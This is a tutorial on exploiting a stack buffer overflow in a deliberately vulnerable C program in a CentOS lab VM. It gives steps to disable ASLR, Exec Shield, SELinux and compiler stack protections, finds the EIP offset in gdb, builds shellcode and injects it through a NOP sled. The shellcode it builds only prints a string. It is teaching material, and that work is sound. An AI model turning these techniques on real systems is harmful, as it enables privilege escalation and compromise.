Writing Buffer Overflows
Required Tools:
- gcc
- gdb
- nasm
- ld
- objdump
- python
This tutorial also assumes that you have a CentOS test environment. This tutorial uses a fresh CentOS 6.3 virtual machine running on Oracle Virtual Box with 512 MB of RAM and an 8 GB hard drive. The tutorial also assumes Python 2. Python version 2.6 was used for documentation. If you have the above tools you'll be able to compile all the code and test it out on your CentOS box. Note that you will need root privileges to make some of the modifications specified. To install the above software on CentOS use:
$ sudo yum install gcc gdb nasm ld binutils python
Introduction
Buffer overflow vulnerabilities are some of the most prolific and dangerous types of attacks in computer security. The problem essentially boils down to two main factors. The first is that C doesn't enforce type checking and therefore if a programmer isn't careful to handle exceptions unexpected behavior may occur. The second problem is that many process programs written in C run with escalated privileges. This means that an exploit of such a program yields effective control at the level of the exploited process. Since many of these processes run as root, or SYSTEM, successfully exploiting them allows a malicious user a privilege escalation that amount to total control over the target machine.
Buffer overflow exploits are accomplished by mangling the way that C handles memory allocation. When a program in C begins, or starts a function, it allocates a stack of memory for that particular piece of the program. This stack consists of space for variables and data, as well as pointers to return flow control to the proper place in the stack. This allows stacks to grow dynamically as programs fork and carry out subroutines and other processes. This is efficient because the stack doesn't have to be initialized at the start of the program with room for every possible execution path of the program. Instead, as the program runs, memory is allocated on a per needed bases.
Programs don't run in a vacuum, however, and one process can't be allowed to own the stack entirely until it's completion. For this reason the return pointer on these individual pieces of the stack (called stack frames) is critical, so that at the end of the frame execution the processor can return to the original programmatic instructions and continue the program.
Because these frames are allocated dynamically and because they are of a fixed size, if a programmer is not careful it becomes possible to pass in more variable data than is reserved on the stack. For instance, if the following represents a frame:
------------------ | data | ------------------ | data | ------------------ | data | ------------------ | data | ------------------ | data | ------------------ | return pointer | ------------------
You can see that there are 5 'slots' for data in the frame, the sixth slot is for the return pointer. What happens if the program tries to write 6 'slots' of data into the frame? An exception probably, but if the attacker is careful they could arbitrarily send the pointer to a different location in memory, perhaps a location that contains malicious code.
Turning Off Stack Randomization
Before we get too far into this tutorial lets make sure to create an 'easier' environment for our work. The Linux VA patch is a modification to the kernel that allows for stack randomization which makes it much harder to create reliable buffer overflow exploits. This patch randomizes the stack pointer, making it more difficult to find our jump address to kick off the exploit. It's possible to carry out the exploit with this patch enabled, just much more difficult. Check to make sure the Linux VA patch is disabled as follows. First check to see if randomize_va_space is set off (to zero):
$ cat /proc/sys/kernel/randomize_va_space 0
Red Hat also implements another layer of protection called Exec Shield. Exec Shield is a form of Dynamic Execution Protection (DEP) that makes certain portions of memory space non-executable. You'll want to disable this protection as well. You can check to see if Exec Shield is enabled using the command:
$ cat /proc/sys/kernel/exec-shield 0
If you happen to find either of these enabled (set to a non-zero number) then disable them by adding the following lines to /etc/sysctl.conf (you'll need root to do this):
kernel.randomize_va_space = 0 kernel.exec-shield = 0
Finally you can load these new values into the running kernel using the command:
$ sudo sysctl -p
The most effective way to do this is to pass in malicious bytecode as part of the 'data' and then overwrite the return pointer with the location of the malicious bytecode. Even this process is tricky though, because the return pointer must point to the exact location of the exploit code or the code will fail. For instance, if the pointer lands in the middle of the exploit code it won't execute properly. A neat trick is to pad the start of the exploit shellcode with NOP (no operation) instructions. When the machine encounters a NOP it simply moves to the next instruction. If there are a series of NOP instructions preceding the malicious shell code then the pointer merely has to hit one of them, and then the instructions will cascade down the NOP's to the shellcode. This technique is called a NOP sled.
Other Fine Tuning
You may notice that a lot of tutorials online have a bunch of documentation that points to examining the core dumps of programs that throw segmentation faults. When utilizing your own modern Linux box you might find that your buffer overflow attempts are causing a segmentation fault, but not a core dump. Core dumps can be controlled (if you have sufficient privileges) at the command line as part of your user profile. To check if you have core dump enabled try:
$ ulimit -c 0
If you see the above output (a zero) it means your don't have the ability to view core dumps. Go ahead and change that using:
$ ulimit -c unlimited
This will enable you to view the core dump of your files using GDB. The syntax is:
$ gdb
Where
$ cat /selinux/enforce
If you get a no such file error then SELinux is turned off. Otherwise edit the file /etc/selinux/config and change the value to disabled and restart your machine.
A Further Look at Stack
When you read about buffer overflows you'll read a lot about stacks, heaps, frames and the buffer. It's all a little confusing, even if you understand some of the topics, so it's worth examining more closely. As programs are executed they are assigned blocks of memory. Ultimately these are just places in RAM. The processor runs through blocks of memory in order's supplied to them by the 'register'. The register keeps track of what instructions are to be passed to the processor and where they are located. When a program starts it is assigned a block of memory that looks something like this:
--------------------------- | Arguments and variables | --------------------------- | Stack | --------------------------- | Stack | --------------------------- | Unused Memory | --------------------------- | Unused Memory | --------------------------- | Heap | --------------------------- | Program Data | ---------------------------
Ok, so that looks a little weird, but it easily demonstrates how the stack can grow down and the heap can grow up. Those are the two areas where dynamic memory is utilized.
The stack is reserved for dynamic input and function variables. You need this to be dynamic because at run time a program has no idea what sort of input it will get or need to assign to a variable. Some variables might get their value from user input, some from the system, some from reading files, and so on. You can see how it would be impossible for the program to calculate what sort of input it would get (and how that might cause the program to branch) at run time. So the program lines up the instructions in the 'Low Addresses' (the Program Data) part of the diagram. As it runs into blocks of code it allocates space on the stack to hold the variables.
So lets say the program starts with main(). The computer allocates a frame on the stack for the main() function that holds it's variables, etc. So the stack looks something like:
----------------- | data | | data | | return address | -----------------
I've drawn this upside down because it's easier to understand as a stack in this orientation. now the register points at the top of the frame and begins to feed instructions into the processor. Let's say the program calls a function called foo() in main() though. What happens then? Well, a new frame is added to the stack, with the return pointer at the end showing the register where to move next once it's done with the particular frame. Now the stack might look something like:
----------------- | data | | return address | ----------------- | data | | data | | return address | -----------------
With the variables for foo() on top of the stack. The return pointer is at the end showing the register where to move in the stack to pick back up in main() at the point after the function foo() is called. It is important to note that these pointers show the register where to return to execute program instructions, values that are usually held in the bottom of the stack as program data. Knowing this you can see why a return pointer is necessary, rather than having the program just chew down the stack.
A Look at the Victim
Let's examine the following code for the blame program. The code actually makes a rudimentary attempt to prevent a buffer overflow exploit, but one which doesn't work.
#include <stdio.h> #include <string.h> #define INPUT_BUFFER 256 /* maximum name size */ /* * read input, copy into s * gets() is insecure and prints a warning * so we use this instead */ void getlines(char *s) { int c; while ((c=getchar()) != EOF) *s++ = c; *s = '\0'; } /* * convert newlines to nulls in place */ void purgenewlines(char *s) { int l; l = strlen(s); while (l--) if (s[l] == '\n') s[l] = '\0'; } int main() { char scapegoat[INPUT_BUFFER]; getlines(scapegoat); /* this check ensures there's no buffer overflow */ if (strlen(scapegoat) < INPUT_BUFFER) { purgenewlines(scapegoat); printf("It's all %s's fault.\n", scapegoat); } return 0; }
Looking at the code you can see that the main() function sets up the char variable scapegoat with a size set to the constant INPUT_BUFFER (which is 256). A pointer to this variable is now passed to the getline() function which copies the program's input using getchar() into the variable scapegoat. The problem with this function is even after the getline() function finishes and control returns to main() the buffer has been overflown, so the check for length that occurs as the next instruction:
if (strlen(scapegoat) < INPUT_BUFFER) {
happens too late (the chicken has already flown the coop). Let's begin to explore how this particular buffer overflow works. Copy the code above into a text file on your CentOS machine and save it as blame.c then compile it using the command (which will disable some additional stack protections implemented by the compiler):
$ gcc -fno-stack-protector -z execstack blame.c -o blame
Overflowing the Buffer
First let's ensure that we actually can overflow the buffer. We'll use a little Python at the command line to create some input then check out what is going on using gdb. First I'll demonstrate blame working correctly, however:$ echo foo | ./blame It's all foo's fault. $ python -c 'print "A"*456' | ./blame Segmentation fault
You should see the program crash and a new core file in your current directory (note that the extension may vary since it's the process ID (PID) of the program when it crashes):
$ ls blame blame.c core.1291
You can look at this core file using gdb like so:
$ gdb blame core.1291 GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1) Copyright (C) 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-redhat-linux-gnu". For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>... Reading symbols from /home/justin/blame...(no debugging symbols found)...done. [New Thread 1291] Missing separate debuginfo for Try: yum --disablerepo='*' --enablerepo='*-debug*' install /usr/lib/debug/.build-id/05/14ca88cad3d3d3eee1b7561eaf052da205c024 Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 Core was generated by `./blame'. Program terminated with signal 11, Segmentation fault. #0 0x41414141 in ?? () Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.107.el6_4.4.i686
We can see that there was a termination on 0x41414141. It is not by coincidence since 41 is the numeric equivalent of the ASCII character for capital A.
We can use gdb to show us the values of all the registers in memory at the time of the crash. This will show us the value of the effective base pointer (ebp) as well as the effective stack pointer (esp) that correspond to values the computer is using to track execution in the memory stack. To view pointers use the info registers command in gdb like so:
(gdb) info registers eax 0x0 0 ecx 0x20 32 edx 0x5 5 ebx 0x2c3ff4 2899956 esp 0xbffff630 0xbffff630 ebp 0x41414141 0x41414141 esi 0x0 0 edi 0x0 0 eip 0x41414141 0x41414141 eflags 0x10216 [ PF AF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
Looking at the output you can see that the ebp and the eip have both been overwritten with a series of ASCII A's. The eip in particular is the pointer to the next instruction, and the memory address 0x41414141 falls outside of our stack range and thus the program crashed.
A Simple Fix
A simple change in the function will prevent this behavior, but you can easily see how a vulnerability such as this could be overlooked. If getline is rewritten as:
void getlines(char *s) { int c; int x = 0; while ((c=getchar()) != EOF && x < INPUT_BUFFER - 1) { *s++ = c; x++; } *s++ = '\0'; }
The program functions safely regardless of the input size. This modification also prevents the gnarly segfault errors from showing up, effectively handling exceptions in a cleaner manner.
Back to Our Regularly Scheduled Exploit
Ok, so now back to our exploit. We know now that an input size of 356 bytes will cause a buffer overflow and overwrite the eip. If we can exploit this weakness we can cause the program to execute some arbitrary commands. Let's begin with what is arguably the most difficult part of this process, our shellcode. While there are shellcode generators out there online, it's a lot easier to be able to build your own, especially if you want to be able to craft very specific behavior out of your buffer overflow.
Generating Shellcode
Let's create some shellcode that makes blame print out the output "Now I p0wn your computer" instead of it's normal function. Usually you'll want a buffer overflow to spawn a shell or perhaps open a backdoor listening port on the target computer, but we'll keep it simple for now. Shellcode, often referred to as bytecode, is basically just assembly language. Now, don't worry if you don't know a whole lot of assembly at this point, we're going to leverage some tools to help make it easier. The first thing we want to do is create a program to test our bytecode. Using the following:
/*shellcodetest.c*/ char shellcode[] = "substitute shellcode here"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) shellcode; (int)(*func)(); }
We can substitute our shellcode for the "substitute shellcode here" portion. Go ahead and create the file shellcode.c by cutting and pasting the above. Next compile this program so we can use it (I'm assuming you know how to compile raw C code but I'll go ahead and be explicit here just in case):
$ gcc -o shellcodetest shellcodetest.c
This creates the executable shellcodetest in the current working directory. Now, it isn't going to work at this point since we don't actually have any shellcode assigned to the shellcode[] variable. Let's go ahead and tackle that challenge now.
For this task we're totally going to gank the hello.asm code from http://www.vividmachines.com/shellcode/shellcode.html (see citations below) and modify it to suit our purposes. You can use C to generate your shellcode as well, but there are some problems that crop up along the way. For instance, you cannot have any null bytes (\x00) in your shellcode or it is interpreted as the end of text input (as the getchar() or other input function in the C program is reading input it stops as soon as it encounters a null, thus your shellcode won't be loaded into memory entirely). For now we'll gloss over how to modify your assembly code using 'xor' to get rid of these null bytes and keep things simple. The code we're going to use is as follows:
;hello.asm [SECTION .text] global _start _start: jmp short ender starter: xor eax, eax ;clean up the registers xor ebx, ebx xor edx, edx xor ecx, ecx mov al, 4 ;syscall write mov bl, 1 ;stdout is 1 pop ecx ;get the address of the string from the stack mov dl, 24 ;length of the string int 0x80 xor eax, eax mov al, 1 ;exit the shellcode xor ebx,ebx int 0x80 ender: call starter ;put the address of the string on the stack db 'now I p0wn your computer'
If we were really l337 we'd use 'now I p0wn j00r b0x3n' as our string, but that's another tutorial ;) For now we do the following:
$ nasm -f elf hello.asm $ ld -o hello hello.o
You can confirm that everything worked properly by executing the hello program at the command line:
$ ./hello now I p0wn your computer$
Once you're sure your assembly code works it's time to look at the source so that we can pull out the hexidecimal instructions to introduce into our shellcode:
$ objdump -d hello hello: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: eb 19 jmp 804809b <ender> 08048082 <starter>: 8048082: 31 c0 xor %eax,%eax 8048084: 31 db xor %ebx,%ebx 8048086: 31 d2 xor %edx,%edx 8048088: 31 c9 xor %ecx,%ecx 804808a: b0 04 mov $0x4,%al 804808c: b3 01 mov $0x1,%bl 804808e: 59 pop %ecx 804808f: b2 18 mov $0x18,%dl 8048091: cd 80 int $0x80 8048093: 31 c0 xor %eax,%eax 8048095: b0 01 mov $0x1,%al 8048097: 31 db xor %ebx,%ebx 8048099: cd 80 int $0x80 0804809b <ender>: 804809b: e8 e2 ff ff ff call 8048082 <starter> 80480a0: 6e outsb %ds:(%esi),(%dx) 80480a1: 6f outsl %ds:(%esi),(%dx) 80480a2: 77 20 ja 80480c4 <ender+0x29> 80480a4: 49 dec %ecx 80480a5: 20 70 30 and %dh,0x30(%eax) 80480a8: 77 6e ja 8048118 <ender+0x7d> 80480aa: 20 79 6f and %bh,0x6f(%ecx) 80480ad: 75 72 jne 8048121 <ender+0x86> 80480af: 20 63 6f and %ah,0x6f(%ebx) 80480b2: 6d insl (%dx),%es:(%edi) 80480b3: 70 75 jo 804812a <ender+0x8f> 80480b5: 74 65 je 804811c <ender+0x81> 80480b7: 72 .byte 0x72
What we're doing here is using the programs nasm, ld, and objdump. The important values (the good stuff) are contained in the second column of the output (the part on the second line that reads 'eb 19'). If you copy all of these out and preface them with "\x" then you have valid shellcode.
So copying out the above example gives us the following 56 instructions:
eb 19 31 c0 31 db 31 d2 31 c9 b0 04 b3 01 59 b2 18 cd 80 31 c0 b0 01 31 db cd 80 e8 e2 ff ff ff 6e 6f 77 20 49 20 70 30 77 6e 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72
We transform this into shellcode and put it into our test program above:
/* revised shellcodetest.c */ /* now with working code :) */ char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3"\ "\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff"\ "\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72"\ "\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"; main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); }
Lets test out the above code to make sure it works. Save the modified file as shellcodetest.c. Next we'll have to compile the program using gcc and a couple of handy flags that will disable stack protection and stack execution protection as they are enabled in the compiler itself. Compile it using the following command (note this is just one line):
$ gcc -fno-stack-protector -z execstack -o shellcodetest shellcodetest.c
Then test the shellcode to see if it works:
$ ./shellcode now I p0wn your computer
Injecting the Shellcode
Ok, the next part of the process is to actually inject the shellcode into a running process with a buffer overflow exploit. First let's examine our overflow of the blame program. We know that with 356 bytes of A's that the eip is overwritten with four bytes worth of A's, or 0x41414141. If we examine this behavior more closely we'll find that the A's that overwrite the eip aren't in fact the last four A's of the payload.
$ python -c 'print "A"*100 + "B"*56 + "C"*300' | ./blame Segmentation fault (core dumped) $ ls blame blame.c core.1291 core.1315
We can now look at this new core file, noting that it crashed at an illegal instruction at 0x43434343 and that the eip is overwritten with 43's, or the ASCII numeric representation of the letter C.
$ gdb blame core.1315 [New Thread 1315] Core was generated by `./blame'. Program terminated with signal 11, Segmentation fault. #0 0x43434343 in ?? () (gdb) i r eax 0x0 0 ecx 0x20 32 edx 0x9 9 ebx 0x2c3ff4 2899956 esp 0xbffff630 0xbffff630 ebp 0x43434343 0x43434343 esi 0x0 0 edi 0x0 0 eip 0x43434343 0x43434343 eflags 0x10216 [ PF AF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
You'll notice I used a shorthand for the info registers command by simply typing i r to get the same data. This technique of running the program, dumping the core, then examining the core file with gdb is handy, but somewhat time consuming. What we actually want to do is run this process from within gdb to cut down on time. We can do this by firing up gdb and running the blame program and redirecting input from a file. We can jump out of gdb at any time to modify this text file using:
(gdb) shell $
Then returning to gdb using the command:
$exit (gdb)
This will allow us to modify our input text file quickly and easily. What we're trying to do is use A, B, and C to line up four bytes in the eip that we can use to point to our shell code. When we can overwrite the eip, and only the eip, with four letter B's then we know exactly how to align our buffer overflow so that the overwritten eip is within our control (and can be used to point to our shellcode). Let's get started as follows:
$ python -c 'print "A"*100 + "B"*4 + "C"*250' > input $ cat input AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [... snip ...] $ gdb blame (gdb) run blame < input Starting program: /home/justin/blame blame < input Program received signal SIGSEGV, Segmentation fault. 0x43434343 in ?? () (gdb) i r eax 0x0 0 ecx 0x20 32 edx 0x3 3 ebx 0x2c3ff4 2899956 esp 0xbffff5f0 0xbffff5f0 ebp 0x43434343 0x43434343 esi 0x0 0 edi 0x0 0 eip 0x43434343 0x43434343 eflags 0x10212 [ AF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
It looks like on our first try the eip is being overwritten with C characters, so let's increase the number of A's and decrease the number of C's like so:
(gdb) shell $ python -c 'print "A"*300 + "B"*4 + "C"*52' > input $ exit exit (gdb) run blame < input The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/justin/blame blame < input Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) i r eax 0x0 0 ecx 0x20 32 edx 0x5 5 ebx 0x2c3ff4 2899956 esp 0xbffff5f0 0xbffff5f0 ebp 0x41414141 0x41414141 esi 0x0 0 edi 0x0 0 eip 0x41414141 0x41414141 eflags 0x10216 [ PF AF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
As we can see we have overshot the mark and now eip is overwritten with A's. We continue this process until we can narrow in on a way to place the B's over the eip like so:
(gdb) shell $ python -c 'print "A"*250 + "B"*4 + "C"*102' > input $ exit exit (gdb) run blame < input The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/justin/blame blame < input Program received signal SIGSEGV, Segmentation fault. 0x43434343 in ?? () (gdb) shell $ python -c 'print "A"*270 + "B"*4 + "C"*82' > input $ exit exit (gdb) run blame < input The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/justin/blame blame < input Program received signal SIGSEGV, Segmentation fault. 0x42424141 in ?? ()
And now you can see I've managed to get a couple of B's (ASCII 42) into the eip so that I now know that to overwrite the eip with B's I need 268 A's first, then my B's then 84 C's.
(gdb) shell $ python -c 'print "A"*268 + "B"*4 + "C"*84' > input $ exit exit (gdb) run blame < input The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/justin/blame blame < input Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) i r eax 0x0 0 ecx 0x20 32 edx 0x5 5 ebx 0x2c3ff4 2899956 esp 0xbffff5f0 0xbffff5f0 ebp 0x41414141 0x41414141 esi 0x0 0 edi 0x0 0 eip 0x42424242 0x42424242 eflags 0x10216 [ PF AF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
And viola, now I have the exact boundaries of my exploit! Now, let's add our shellcode (which is 54 bytes long) to the end, replacing the 84 C characters and using a NOP sled at the beginning. We can then use gdb to examine the actual contents of the stack, in this case looking at the 256 bytes that come after the esp and check to ensure that our shell code is actually there:
(gdb) shell $ python -c 'print "A"*268 + "B"*4 + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' > input $ exit exit (gdb) run blame < input The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/justin/blame blame < input Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) i r eax 0x0 0 ecx 0x20 32 edx 0x1 1 ebx 0x2c3ff4 2899956 esp 0xbffff5f0 0xbffff5f0 ebp 0x41414141 0x41414141 esi 0x0 0 edi 0x0 0 eip 0x42424242 0x42424242 eflags 0x10216 [ PF AF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/256xb $esp 0xbffff5f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffff5f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffff600: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffff608: 0x90 0x90 0x90 0x90 0x90 0x90 0xeb 0x19 0xbffff610: 0x31 0xc0 0x31 0xdb 0x31 0xd2 0x31 0xc9 0xbffff618: 0xb0 0x04 0xb3 0x01 0x59 0xb2 0x18 0xcd 0xbffff620: 0x80 0x31 0xc0 0xb0 0x01 0x31 0xdb 0xcd 0xbffff628: 0x80 0xe8 0xe2 0xff 0xff 0xff 0x6e 0x6f 0xbffff630: 0x77 0x20 0x49 0x20 0x70 0x30 0x77 0x6e 0xbffff638: 0x20 0x79 0x6f 0x75 0x72 0x20 0x63 0x6f 0xbffff640: 0x6d 0x70 0x75 0x74 0x65 0x72 0x0a 0x00 0xbffff648: 0x02 0x00 0x00 0x00 0x70 0x83 0x04 0x08 0xbffff650: 0x00 0x00 0x00 0x00 0x20 0x4d 0x12 0x00 0xbffff658: 0x0b 0xcc 0x14 0x00 0xc4 0xef 0x12 0x00 0xbffff660: 0x02 0x00 0x00 0x00 0x70 0x83 0x04 0x08 0xbffff668: 0x00 0x00 0x00 0x00 0x91 0x83 0x04 0x08 0xbffff670: 0x8d 0x84 0x04 0x08 0x02 0x00 0x00 0x00 0xbffff678: 0x94 0xf6 0xff 0xbf 0xf0 0x84 0x04 0x08 0xbffff680: 0xe0 0x84 0x04 0x08 0xa0 0xf4 0x11 0x00 0xbffff688: 0x8c 0xf6 0xff 0xbf 0x00 0x00 0x00 0x00 0xbffff690: 0x02 0x00 0x00 0x00 0xc0 0xf7 0xff 0xbf 0xbffff698: 0xd3 0xf7 0xff 0xbf 0x00 0x00 0x00 0x00 0xbffff6a0: 0xd9 0xf7 0xff 0xbf 0xf8 0xf7 0xff 0xbf 0xbffff6a8: 0x08 0xf8 0xff 0xbf 0x1c 0xf8 0xff 0xbf 0xbffff6b0: 0x2a 0xf8 0xff 0xbf 0x4b 0xf8 0xff 0xbf 0xbffff6b8: 0x5e 0xf8 0xff 0xbf 0x6a 0xf8 0xff 0xbf 0xbffff6c0: 0x77 0xfe 0xff 0xbf 0x83 0xfe 0xff 0xbf 0xbffff6c8: 0xd6 0xfe 0xff 0xbf 0xf2 0xfe 0xff 0xbf 0xbffff6d0: 0x01 0xff 0xff 0xbf 0x12 0xff 0xff 0xbf 0xbffff6d8: 0x26 0xff 0xff 0xbf 0x37 0xff 0xff 0xbf 0xbffff6e0: 0x40 0xff 0xff 0xbf 0x57 0xff 0xff 0xbf 0xbffff6e8: 0x69 0xff 0xff 0xbf 0x71 0xff 0xff 0xbf
You can see our shell code neatly nestled in between two NOP sleds. Let's choose an arbitrary memory address in the preceeding NOP sled to use as our target, say 0xbffff5f8. Instead of overwriting the eip with B's we'll instead overwrite the eip with our target address, which should land code execution in the middle of the NOP sled, then proceed down to our shell code. Due to the vagaries of low level architecture, we have to rewrite this address in little endian format (if you overlook this then your address won't work), so it becomes:
\xf8\xf5\xff\xbf
Now, lets plug this value in for the "BBBB" part in our payload and test it out:
(gdb) shell $ python -c 'print "A"*268 + "\xf8\xf5\xff\xbf" + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' > input [justin@localhost ~]$ exit exit (gdb) run blame < input The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/justin/blame blame < input now I p0wn your computer Program exited normally.
And there you have it. Now, at this point the payload will only work in the gdb environment. In order to get it working in the wild we'll have to be a little more creative.
Release the 'Sploit
Now that we've got our shellcode injection and buffer overflow working inside gdb it's time to turn our attention to use of the exploit in the wild. Although our exploit works inside a debugging environment, you might be surprised to learn that it won't actually work at the command line. You can test this like so:
$ python -c 'print "A"*268 + "\xf8\xf5\xff\xbf" + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' | ./blame Illegal instruction
This is odd since the overflow worked perfectly inside of our debugger. There are a couple of reasons for this. The first is due to the debugger itself, which, when run, actually uses up memory addresses on it's own, and pushes off the address of the blame program. This makes sense as we are using the debugger to observe and report on the operation of blame, gdb itself must first be loaded into memory.
The second reason that the exploit won't work involves the way that memory is abstracted for programs to use. Your computer has a whole bunch of memory, probably gigabytes. Although each program gets an allocation of this total memory when it runs, the kernel actually makes the memory appear as though it is solely for the use of a particular program. In other words, the kernel lies to the program. When a program starts up the kernel recognizes the program and reports to the program that it has pretty much all the memory it wants: “Oh sure blame, here's 8 GB of memory, have at it!” In reality the blame program only gets a small fraction of the total memory.
In addition to the lie that the kernel tells programs about how much memory they have, the kernel also does something that is actually designed for convenience. In order to make it easier for programs to run, and access memory, the kernel actually tells programs that not only do they get all the memory that they want, but that they are running at the very bottom of the memory space, and can use all the upward space they want. As we saw before, we're overwriting a memory address around 0xbffff5f8, which is very close to the top of the memory space at 0xffffffff. Our program thinks it has all the memory it wants!
In order to make our exploit work in the wild we're going to have to be a little more careful about how we overflow the buffer. In our work with gdb we were smashing through the allocated 256 byte buffer, over the return pointer, and off into the the rest of program memory. We were loading our exploit code into another stack frame entirely, which didn't much matter in our gdb exploit, but it was pretty sloppy. A better strategy would have been to write our NOP sled at the start of our input buffer, place the exploit code next, and use the final four bytes to overwrite the pointer. This would reduce the overall size of our exploit to the 212 byte NOP sled, the 56 bytes of instructions, and a 4 byte overwrite (for a total of 272 bytes. Although this makes a smaller, and neater, exploit it still leaves us the problem of finding an address location in our NOP sled. In order to inspect a typical stack layout we can use a simple program, that allocates some stack space, and then reports on the memory location of that space. Copy in the following program to do just that:
/**** show_sp.c ****/ #include <stdio.h> int main(void) { char buffer[256]; char buffer2[6]; printf("First var: 0x%x\n", &buffer); printf("Next var: 0x%x\n", &buffer2); return 0; }
You'll note that by listing the variable name with an ampersand preceding it the output will contain the address of the start of the variable rather than the contents of the variable (its value). Using these two values we can gauge where in memory we will need to point our exploit payload towards. Compile and run this program to get a better idea of what the address space we're looking for will resemble:
$ gcc -fno-stack-protector -z execstack -o show_sp show_sp.c [justin@localhost ~]$ ./show_sp First var: 0xbffff520 Next var: 0xbffff51a
These address spaces look fairly familiar. Let's try using the First var value for our instruction pointer:
$ python -c 'print "\x90"*212 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' | ./blame now I p0wn your computer
And the exploit works! Now, this program (and the injected shellcode) was pretty benign, but if we were to change the shellcode to do something more malicious, or if the program had been a suid program (set to run as another user, typically root) then we could have leveraged the privilege escalation to do all sorts of things.
Sources and Recommended Reading:
- Smashing The Stack For Fun And Profit by Aleph One (Phrack 49 - 14)
- Writing buffer overflow exploits - a tutorial for beginners by Mixter
- Shellcoding for Linux and Windows Tutorial by steve hanna
- Metasploit Framework Web Console
- Buffer Overflow Tutorial by Preddy - RootShell Security Group
- How Shellcodes Work by by Peter Mikhalenko (5/18/2006)
- Buffer Overflows Demystified by Murat Balaban
- Introduction to Buffer Overflow by Ghost_Rider
- Linux Assembly
- Memory Layout and the Stack By Peter Jay Salzman